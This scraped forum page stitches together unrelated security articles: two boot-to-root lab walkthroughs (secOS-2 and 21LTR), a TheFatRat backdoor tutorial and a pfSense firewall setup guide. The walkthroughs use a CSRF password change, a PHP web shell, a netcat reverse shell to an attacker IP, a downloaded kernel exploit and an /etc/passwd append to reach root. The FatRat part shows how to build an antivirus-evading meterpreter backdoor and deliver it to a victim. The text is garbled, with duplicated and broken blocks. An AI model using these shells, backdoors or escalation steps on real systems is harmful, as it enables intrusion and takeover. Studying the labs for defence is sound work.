04-24-2020, 01:59 PM
| 0 | 0 | ||
[To see content please register here]
. I quickly loaded up the machine and it was primed and ready!Steps involved:
- IP discovery and port scanning
- Running the web app
- Running a CSRF attack on the administrator
- Tricking admin to visit a fake page by sending him a message
- Waiting a few minutes to let admin visit that page
- Getting credentials and logging in SSH using these
- Running overlayfs on the system
- Getting root access!
I need not say this after so many articles but the first and foremost step is running netdiscover to find the IP address of the VM.
![[Image: 1.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-Rm4CDh5sGbU/W2lKtdT0JEI/AAAAAAAAZb0/_VPgLJ8YffY7GTLuQQ2-CzPPN31SWn3-gCLcBGAs/s1600/1.png?w=687&ssl=1)
The IP address in my case was 192.168.1.128
I run an aggressive nmap scan on this IP address to find which ports were open and the first clue to start the attack on.
nmap -A 192.168.1.128
1
nmap -A 192.168.1.128
![[Image: 2.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-eugosw7JZvc/W2lKusnXWZI/AAAAAAAAZcE/1fgdF1aCBk47ooiG2CSzPgv9Ahn8jRhewCLcBGAs/s1600/2.png?w=687&ssl=1)
We found a web app working on port 8081. Without any delay, we opened it.
![[Image: 2.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-eugosw7JZvc/W2lKusnXWZI/AAAAAAAAZcE/1fgdF1aCBk47ooiG2CSzPgv9Ahn8jRhewCLcBGAs/s1600/2.png?w=687&ssl=1)
We found a web app working on port 8081. Without any delay, we opened it.
![[Image: 3.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-HGLHxGjahmw/W2lKvAty8zI/AAAAAAAAZcI/9BlFn5gUREgbZvJlTvJAf-ch7AuC1oPjQCLcBGAs/s1600/3.png?w=687&ssl=1)
The first hint was the message shown—“Secure Web App is a part of the vulnerable VM called secOS-2”
Hence, we inferred that this VM has web-based vulnerabilities. Next step was to run a Nikto scan which didn’t yield much info either.
So, we ran dirb in hope that we find something good here.
dirb
[To see content please register here]
1
dirb
[To see content please register here]
![[Image: 4.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-4yYDkJyn0l0/W2lKv1z-NnI/AAAAAAAAZcU/vNkCQZtMRjIngYSbvMBRXQMPHIplUnBFgCLcBGAs/s1600/4.png?w=687&ssl=1)
Of course, there is a login page! And a login page in a web vulnerable app means a route to shell!
We moved forward to the login page directly.
![[Image: 5.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-PLfPqhHa8Cs/W2lKvgsmVII/AAAAAAAAZcQ/eB78RYAm-jMSv0RNhxYPb-sFoQqumZ6IACLcBGAs/s1600/5.png?w=687&ssl=1)
Although on inspecting the page, there were no satisfactory results there was still a register user page available to us. We headed over there.
![[Image: 6.1.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-SoWBsu9h1kI/W2lKwTi6NpI/AAAAAAAAZcY/uxP3NAvwnCgY1xOHtX_uvYIw3sKcn2lNgCLcBGAs/s1600/6.1.png?w=687&ssl=1)
Since we got redirected to the home page, it was fair to assume we got registered. Let’s try and login into the web app using that test user.
![[Image: 6.3.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-0p-UC3qMRhI/W2lKwj059eI/AAAAAAAAZcc/g7rOl9VnSFwSwOgbrfp1QK4RfkAjz5JOACLcBGAs/s1600/6.3.png?w=687&ssl=1)
There wasn’t much information on the page except for the fact we saw a “My Messages” tab on the homepage.
Although, it is worthy to note that Burp Spider showed us a page called “hint” and upon inspecting that page we found the following details:
First: The admin visits the site very frequently.
Second: He runs it locally on 127.0.0.1
Third: CSRF is applicable!
After some going around, we found under the “users” tab that Spiderman was the administrator. Could it be possible that we prompt the admin to change its password to our custom pass?
Hence, we wrote a quick HTML CSRF in a text file and saved as csrf.html inside /var/www/html.
![[Image: 7.1.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-GJYxtSHMN_A/W2lKxKG1M1I/AAAAAAAAZck/vNzublfalzoOIJon6tXJaTPLKjPj9NIVwCLcBGAs/s1600/7.1.png?w=687&ssl=1)
What this does is that it will prompt the administrator user to change its password to “passw0rd”
We saved the page to /var/www/html directory, started apache, ran the HTML code and waited for 2-3 minutes and we got logged into administrator account!
![[Image: 8.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-Qg8eRLzNVxg/W2lTTUYmEZI/AAAAAAAAZdM/KrEk4lIcx5U3c_2QBveTJuiRVP9voruFwCLcBGAs/s1600/8.png?w=687&ssl=1)
We found 2 messages from the pirate user. One had a password for unidentified service. Could it be possible that this is a password for SSH?
We tried it out!
ssh [email protected]
1
ssh [email protected]
![[Image: 10.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-fxiyIP5DAkw/W2lKsz6avsI/AAAAAAAAZbs/u5jZ3Ev4qOkkv7LGd3tRcP3R0asnnL5nQCLcBGAs/s1600/10.png?w=687&ssl=1)
It worked!!
Next up, we looked for the Kernel version of the machine.
uname -a
1
uname -a
![[Image: 16.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-QkL12yjks6Y/W2lTYxTYoTI/AAAAAAAAZdU/ncPjkUKo7YQqT9rZ2V_q8lVQtc91ov2vACLcBGAs/s1600/16.png?w=687&ssl=1)
After a couple of minutes of searching for exploits for the given kernel version, we found something worth to our cause.
![[Image: 17.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-J-0fupT_vhg/W2lTY7XK6UI/AAAAAAAAZdY/LuDkTV9Hv2YeIzGLK9deXk-tXeIj7LcggCLcBGAs/s1600/17.png?w=687&ssl=1)
It is exploitable with an exploit called “overlayfs.”
We downloaded it and ran it.
cd /tmp
wget
[To see content please register here]
gcc –o exploit 37292.c1
2
3
cd /tmp
wget
[To see content please register here]
gcc –o exploit 37292.c![[Image: 18.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-j5l5pRReRmc/W2lTZQpv-yI/AAAAAAAAZdc/DGlUa0HZeiQq64CB2WfGRPdXVez8OurQgCLcBGAs/s1600/18.png?w=687&ssl=1)
After it got compiled using gcc, we ran it using:
./exploit
whoami
1
2
./exploit
whoami
![[Image: 19.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-15RgW9KyyGw/W2lTZUcc-9I/AAAAAAAAZdg/HbRd7OTA0OYSj6Q5qnZFUWnU-iEY6cryQCLcBGAs/s1600/19.png?w=687&ssl=1)
Voila! It gave us a root shell.
cd /root
ls
cat flag.txt
1
2
3
cd /root
ls
cat flag.txt
And just like that, it was over. Hope you enjoyed.
![[Image: 20.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-GSeS_zWlSBo/W2lTZkNXiLI/AAAAAAAAZdk/AfLjXqTYauY7z3kMMNn-yaBTs5XGP5mMwCLcBGAs/s1600/20.png?w=687&ssl=1)
21LTR VM is a Boot to Root Challenge based on a scene that there is a penetration testing company and it has hired the players to perform the test on a client company’s internal network. We are given that the Target Machine has a static IP Address. You can download it from here:
[To see content please register here]
Penetrating Methodologies:
- Network Scanning (Nmap, Netdiscover)
- Examining HTTP web page
- FTP Login for log.php file
- Use PHP web shell one-liner
- Insert netcat reverse_shell payload
- Spawn TTY shell
- Editing passwd file for Privilege escalation
- Get Root access
Target Machine’s IP Address: 192.168.2.120
Our first step towards penetration testing is scanning our target with NMAP.
nmap 192.168.2.120
1
nmap 192.168.2.120
![[Image: 1.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-cr_yHTBtaxo/W2M-TADvmeI/AAAAAAAAZGg/41SvJvZUUl0bk1SzWCUmWLw4W6gkzM34QCEwYBhgL/s1600/1.png?w=687&ssl=1)
The result showed us that there are 4 ports opened: 21(FTP), 22(ssh), 80(HTTP), 10001(scp-config).
To further explore and we browsed URL on port 80 and we greeted with a C Program featuring a loop as shown in the given image.
[To see content please register here]
1
[To see content please register here]
![[Image: 2.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-SVFHoOFI8Gs/W2M-VN_BczI/AAAAAAAAZGU/8A3Wk_XZjb0OBodD772nVpC9k0MSo3JKQCEwYBhgL/s1600/2.png?w=687&ssl=1)
After this, we thought to check it’s the source code which leads us to some Login Credentials.
Username: logs
Password: zg]E-b0]+8
58G1
2
Username: logs
Password: zg]E-b0]+8
58G![[Image: 3.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-YcHWzITZJ_o/W2M-VZ57xNI/AAAAAAAAZGY/SMaWDPbC-TEHsjXvTH0vI5SUIWHOEH5pwCEwYBhgL/s1600/3.png?w=687&ssl=1)
So, we tried to connect with FTP through the login credentials we found. After the successful login, we looked around to find a backup_log.php file which we downloaded to our local machine to have a closer look.
ftp 192.168.2.120
1
ftp 192.168.2.120
![[Image: 4.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-POKiKN2iq-4/W2M-Vqt8AbI/AAAAAAAAZGg/pfRAGnrJfoA1gC8Bp_UnXWdDaTkZ1EPLgCEwYBhgL/s1600/4.png?w=687&ssl=1)
After Downloading the file to our local system, we used the cat command to open the file in our terminal as you can see that it contains a PHP program that is used to generate backup logs on the target system.
cat backup_log.php
1
cat backup_log.php
![[Image: 5.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-srhRpXVX7M4/W2M-Vtob2VI/AAAAAAAAZGo/SEL_jE1a7uAhOg4XDG5QtoHTUgRI9rh1ACEwYBhgL/s1600/5.png?w=687&ssl=1)
Let’s see what we can find by directory brute forcing.
dirb
[To see content please register here]
1
dirb
[To see content please register here]
![[Image: 6.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-Lp2Fma9sHts/W2M-WAor-fI/AAAAAAAAZGo/33kAqjhZRQ4D2vnyDF0cSFNhrzoC8WiswCEwYBhgL/s1600/6.png?w=687&ssl=1)
It got us some directories but /logs looks more interesting so Let’s browse
[To see content please register here]
But as you can see in the image given below is that the logs directory is forbidden to access.
We tried to run some commands but didn’t get much success here.
![[Image: 7.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-X3UnMtgPCis/W2M-WsRrk2I/AAAAAAAAZGc/VV55l6mu2GEqSnDwazLenBQbRk9I4_OXwCEwYBhgL/s1600/7.png?w=687&ssl=1)
This is where we got a bit stuck so after some internet searching hours we got in touch with the author of the lab and after his hint, we got that we have to further tweak the 10001 port.
nc -nv 192.168.2.120 10001
1
nc -nv 192.168.2.120 10001
We started a netcat session on the port 10001, we got a blank shell, which uses a PHP one-liner web shell
<?php system($_GET['cmd']) ?>
1
<?php system($_GET['cmd']) ?>
![[Image: 8.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-4U4SaF3DS14/W2M-WrJeESI/AAAAAAAAZGk/V4T8rAU8fI08wsfE9_yimVG26p3zWnLcACEwYBhgL/s1600/8.png?w=687&ssl=1)
Now after using that PHP one-liner, let’s see if we can run some commands. We tried to run the whoami command. It replied with apache. This proves that we can run commands from here.
[To see content please register here]
1
[To see content please register here]
![[Image: 9.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-TbPf6tROPmU/W2M-W-EsQtI/AAAAAAAAZGg/KgY86ZB42PYYQjrYapwJ0d6Ss9E73QDaQCEwYBhgL/s1600/9.png?w=687&ssl=1)
As we observed above that the commands run successfully, now we will try to get a reverse shell on our local machine using netcat. We will be doing this as shown in the image.
[To see content please register here]
-e /bin/sh 192.168.2.12 4431
[To see content please register here]
-e /bin/sh 192.168.2.12 443![[Image: 10.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-JOmy__6o8ao/W2M-TVo13tI/AAAAAAAAZGY/nkWOskxx7TQ1hHQSGpiaU4vp770yX9kEACEwYBhgL/s1600/10.png?w=687&ssl=1)
Meanwhile, we ran that command we also started a netcat listener on our local machine so as to get the shell which will be generated.
nc -lvp 443
1
nc -lvp 443
And as you can see that we got a basic bash shell on port 443 as shown in the image.
But this was an incomplete and improper shell so we invoked a proper shell using a python one-liner
python -c 'import pty; pty.spawn("/bin/sh")'
1
python -c 'import pty; pty.spawn("/bin/sh")'
![[Image: 11.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-EkfwJ-iOxAc/W2M-TUxKOGI/AAAAAAAAZGk/M7P6Cwh0WZs9rGLaNy9lzH-ORuNmIBhhACEwYBhgL/s1600/11.png?w=687&ssl=1)
Now, we are in the target machine but still, we have to escalate the privilege to become root. Here we started to enumerate the target machine for any possible way to get root.
After looking for a while we found an RSA private key in the media directory. We copied the key to our local machine.
cat id_rsa
1
cat id_rsa
![[Image: 12.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-ylx00uy3pvA/W2M-UCSHIQI/AAAAAAAAZGg/sRcH83EnWYANPDgpfQNMwiaItHTsC5XhgCEwYBhgL/s1600/12.png?w=687&ssl=1)
Now we navigated to the user “passwd file” to get the info about the username that we can use for getting the ssh session. We found hbeale.
![[Image: 13.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-kK8Dna1MGX8/W2M-UZqkOZI/AAAAAAAAZGg/oboAvSlJBYEezZnU7MtlqprgodgjUQaUwCEwYBhgL/s1600/13.png?w=687&ssl=1)
Now the RSA Private we copied, we saved it as id_rsa and change its permission using the chmod command so that it can act as the ssh private key.
chmod 600 id_rsa
1
chmod 600 id_rsa
After this, we tried to connect to the target machine using ssh by user hbeale and the private key.
ssh -i id_rsa [email protected]
1
ssh -i id_rsa [email protected]
And as you can see in the image given that we successfully got the shell of user hbeale. But as this is a boot to root challenge we have escalated this shell into a root shell.
![[Image: 14.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-AWBmNr-gtjk/W2M-UV2vJvI/AAAAAAAAZGc/B6kyJhBpSwg6TNgzI6iRNTb3NWOG1sKJgCEwYBhgL/s1600/14.png?w=687&ssl=1)
We used the sudo -l command to extract the information about the command that can be run as root. We found out that we can run cat command.
![[Image: 15.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-pr4R39JqhJY/W2M-UiPRqXI/AAAAAAAAZGo/j2EB9Tbxg64nMJ7U2h7yTzh3xdGZI_lEACEwYBhgL/s1600/15.png?w=687&ssl=1)
Now back to our local machine, here we will use the OpenSSL command to create a password salt for our new user that we will use to log into the target machine.
openssl passwd -1 -salt user3 pass123
1
openssl passwd -1 -salt user3 pass123
![[Image: 16.1.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-ztgsvxgLc2A/W2M-U4rQ3RI/AAAAAAAAZGQ/RU5Z6zO8SB0BCzcS3sc6DrHsrNqI-mwhwCEwYBhgL/s1600/16.1.png?w=687&ssl=1)
On the Target machine, we use the cat command to edit the /etc/passwd file with the login credentials of the user we meant to create (which is going to have the root privileges).
sudo /usr/bin/cat >> /etc/passwd
1
sudo /usr/bin/cat >> /etc/passwd
After successfully edit the /etc/passwd file, we will substitute the new user we created using the su command. After entering the password which we created earlier, we login to the root shell.
This concludes this Boot to Root Challenge.
![[Image: 16.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-j30A5UGqthg/W2M-VFJzUTI/AAAAAAAAZGg/YdiGlmyFY6YWDa9oKLNuDLfOtWqgD0xaACEwYBhgL/s1600/16.png?w=687&ssl=1)
TheFatRat is an easy tool for generate backdoor with msfvenom ( part of metasploit framework ) and program compiles a C program with a meterpreter reverse_tcp payload In it that can then be executed on a windows host Program to create a C program after it is compiled that will bypass most AV
First, to install thefatrat we type the following command on terminal:
git clone
[To see content please register here]
![[Image: 0.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-lstnbgV1BOc/V55Fc2PeMuI/AAAAAAAANDM/OOyY1Jlv2UAmCWYbmblm-cJS5UbDjtaxQCLcB/s1600/0.png?w=687&ssl=1)
Once the cloning is done, go to the installed directory of fatrat and open it in terminal and type the following command to start it:
./fatrat
It will show you many options now select option 1 which is to CREATE BACKDOOR WITH MSFVENOM.
![[Image: 1.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-gZx7Cb1IlNo/V55FdU6adNI/AAAAAAAANDQ/rqdl1bHUUggo4YIcbqB8VkqSgslpVdU8wCLcB/s1600/1.png?w=687&ssl=1)
Now it will give a list of options to choose the format of the backdoor which you have to choose as per your requirements and need. To create a windows executable as a backdoor choose option 2.
![[Image: 2.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-30WjZtLFZOQ/V55FeAslO1I/AAAAAAAANDU/_3Ee-2OGEBsdZRobvW57dWe7WTUMnn1RgCLcB/s1600/2.png?w=687&ssl=1)
Now enter the LHOST IP i.e. your system IP and LPORT i.e. the port you want the reverse connection on your i.e. attacker system. In my case the LHOST is 192.168.0.104 and LPORT is 4444.
And then exit the script by selecting y when asked
![[Image: 3.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-tS3YioaK0k0/V55FeAoZ7sI/AAAAAAAANDc/xLbC1Fs358cLBJY2C62NU581rpmc4i_xwCLcB/s1600/3.png?w=687&ssl=1)
![[Image: 4.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-W4LbkfjvB7w/V55FeJ9X6bI/AAAAAAAANDY/5fLg907uRlQ-rH2xljU8OLn8FVgkNoGtwCLcB/s1600/4.png?w=687&ssl=1)
Now use any trick up your sleeve to transport the backdoor to the victim and set up reverse handler on metasploit with the following commands on the msf terminal-
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.104 (the attacker system IP)
set lport 4444
exploit
Now as soon as the backdoor is executed on the victim’s machine you will get a meterpreter shell as you can see in my case.
![[Image: 5.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-X7MXY4uGPUg/V55FfM8774I/AAAAAAAANDg/EcN34oE0a1cp7v1MU-m7IkCvsCMPlxySwCLcB/s1600/5.png?w=687&ssl=1)
For More Details Visit
[To see content please register here]
Firewall: It is a computer system or network that is designed to block unauthorized access while permitting outward communication. Firewall holds a lot of importance in our technical world as it assures our system’s as well as data’s security. And a firewall in a network helps us to secure the whole network. It acts as a network security device that grants or rejects network access to traffic flows between untrusted zones. Thus, the importance of the Firewall.
To secure a network we should always use a third party firewall instead of windows own firewall as it makes configuration of all network easy and in one system only. If you will use windows own firewall you have to configure if PC by PC which will take a lot of your time.
Setting up a firewall can be complicating. Therefore in this article, we will learn how to set up a firewall using PFSense. By setting this firewall we will create a wall between our networks which will delude our network into two parts i.e External network and internal network.
You can download ISO image for PFSenese from
[To see content please register here]
:Now that you have ISO image, setup PFSense in your virtual machine just like you set up your windows and turn its power on and PFSense will open:
![[Image: 1.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-MN0SH-V6cUE/V5uCrErXpEI/AAAAAAAANBY/OvkSmPReiesevMkAVSXVrvNw8H-woyozgCLcB/s1600/1.png?w=687&ssl=1)
![[Image: 2.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-1aFP4LquGtk/V5uC1hnfCAI/AAAAAAAANCE/eRRdaJIBikUQqGN1aQVdcAeL-lgjBpWdgCLcB/s1600/2.png?w=687&ssl=1)
Once it’s rebooted, select accept these Settings.
![[Image: 3.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-ggU78jZFcVw/V5uC2481sVI/AAAAAAAANCM/ONYjXZA0YPcxsDj4OcqS6U5n8_To7xKfwCLcB/s1600/3.png?w=687&ssl=1)
From the next dialogues, box select Quick/Easy Install.
![[Image: 4.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-il8TOb3KoWU/V5uC3j0KXzI/AAAAAAAANCQ/_9CQGVEbXqQ3nxaxMOksLutspt8dh8YxgCLcB/s1600/4.png?w=687&ssl=1)
When you click on ok it will allow the installation process to begin without asking unnecessary questions:
![[Image: 5.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-RrIm1EzfWvU/V5uC4bouTAI/AAAAAAAANCU/JEty6igP16MDueVKybXT2M0zvRspgoAVQCLcB/s1600/5.png?w=687&ssl=1)
And the installation begins:
![[Image: 6.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-r2ik68NP2N0/V5uC4bTWXuI/AAAAAAAANCY/V6sepqZ1Cl8tfxdHs84trSD7jvgo7pY-wCLcB/s1600/6.png?w=687&ssl=1)
Now for installing custom configuration select Standard Kernel option.
![[Image: 7.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-5eihB4ZJPTw/V5uC4-4tJYI/AAAAAAAANCc/hp1t744btKsn4wQ2QvNR611hT6yjEgifQCLcB/s1600/7.png?w=687&ssl=1)
And it will start installing:
![[Image: 8.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-I0CH3K2X3mQ/V5uC5ejUlEI/AAAAAAAANCg/D_4kHd9ztYQPUtOtdL-NHLG4oORH9CO-gCLcB/s1600/8.png?w=687&ssl=1)
Now, select the Reboot option so that the firewall can start.
![[Image: 9.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-CbJhf4eoi0k/V5uC5sBTZjI/AAAAAAAANCk/j22wKf3-w5IZP2BqO0Ni4QGq8Vm-A9YKQCLcB/s1600/9.png?w=687&ssl=1)
Thus, rebooting will begin.
![[Image: 10.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-jAIMaJ2DFpI/V5uCrkcDX3I/AAAAAAAANBg/EO6UqzRmBxExMjMKWZw1p6La8Xk-60zNQCLcB/s1600/10.png?w=687&ssl=1)
After the rebooting process, it will ask you if you want to set up VLAN’s. Here just type n for no and hit enter.
![[Image: 11.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-acJOmcyjSz4/V5uCrHCFRMI/AAAAAAAANBc/NLRhycVVtPQJ3OpiJ08gdiP1fSAbr2lHACLcB/s1600/11.png?w=687&ssl=1)
Now it will ask you to name WAN and LAN interface. Give le0 name to WAN and le1 to LAN. Then just hit enter when it asks you to name optional interface.
![[Image: 12.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-HcZTVNabj-c/V5uCsEb_3OI/AAAAAAAANBk/kEwUsa2HcNopcWgPRWcDhT3GJ0IVLcfbwCLcB/s1600/12.png?w=687&ssl=1)
It will show you the interfaces and their name now and will require your permission to proceed. Press y for yes as you are permitting it to proceed.
![[Image: 13.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-mNJXWZYydOU/V5uCtREII8I/AAAAAAAANBo/_RTee59Oc2EOsVv2qQu5xTnqZK5bUQy1wCLcB/s1600/13.png?w=687&ssl=1)
Now, in the following image you can see that it has automatically taken IP address for WAN i.e 192.168.1.7, if you wish to set the desired IP for WAN then choose 2 option and press 1 for the configuration of WAN.
![[Image: 14.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-0_Hz9k8FWsA/V5uCuvT31nI/AAAAAAAANBs/e4Va-2rmJoEA3x_HdBr3IYKvqBCtMRSZgCLcB/s1600/14.png?w=687&ssl=1)
It will ask you that if you want to assign the IPv4 IP address. Here, press n for no. When you hit enter it will ask you if you want to assign IPv4 IP address. Here, enter your desired IP address and press enter. Then it will ask you to give subnet mask for the IP address that you have just entered. Now as our IP address was of C-class we will give 24 as the subnet mask. After hitting enter it will ask you if you want to give upstream gateway. Here, just press enter. And when it asks you to set IPv6 via DHCP6 then simply press enter without typing anything else as we do not require IPv6. And when it asks you for HTTP web configuration press n for no.
![[Image: 15.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-2iDvXTmOaso/V5uCwXDo58I/AAAAAAAANBw/65LkwaveOKcDRdEG7Cv9PdFQdN3nOxdKwCLcB/s1600/15.png?w=687&ssl=1)
![[Image: 16.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-UJJ5SXfVLf8/V5uCwVNfZtI/AAAAAAAANB0/ivkiIs7thyElROnVDbb-rQCByxdcttmrACLcB/s1600/16.png?w=687&ssl=1)
Similarly, you can set up LAN IP address by selecting 2 for assigning an IP address and select 2 for LAN.
![[Image: 17.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-87PPTwpdXnI/V5uCx2E-UjI/AAAAAAAANB4/VkMqIBp9FE8If5CNWcisF4NNMr0CjgzRgCLcB/s1600/17.png?w=687&ssl=1)
Just like before, it will ask you for the IP address of LAN and so you enter your LAN IP address. And then it will ask you for the subnet mask, here we have given subnet mask of 8 as our IP is of A-class. Just hit enter when it asks you to enter the upstream gateway. And also hit enter when it asks you to enter IPv6 as we do not require it. And then press y for HTTP revert option.
![[Image: 18.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-XpdtH39SzXc/V5uCy3dFt4I/AAAAAAAANB8/DQ_ovEyCdr0RDh6NSFFmepuA8erwR1PTwCLcB/s1600/18.png?w=687&ssl=1)
![[Image: 19.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-ALU_G_fQleg/V5uC0Nl3kLI/AAAAAAAANCA/0tptLysBZHYsP9scvloflLNuSGfYMpv3gCLcB/s1600/19.png?w=687&ssl=1)
Now to check that your firewall has been configured properly, let’s ping an IP address. Select option 7 and enter the IP address you want to ping. If it successfully pings that means your firewall has been configured successfully. And you can press enter to continue.
![[Image: 20.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-ERAINAyuPrA/V5uC2C0qfWI/AAAAAAAANCI/TCewnzG8LoseZBw3R4IGCTGf7YAO3SV4ACLcB/s1600/20.png?w=687&ssl=1)













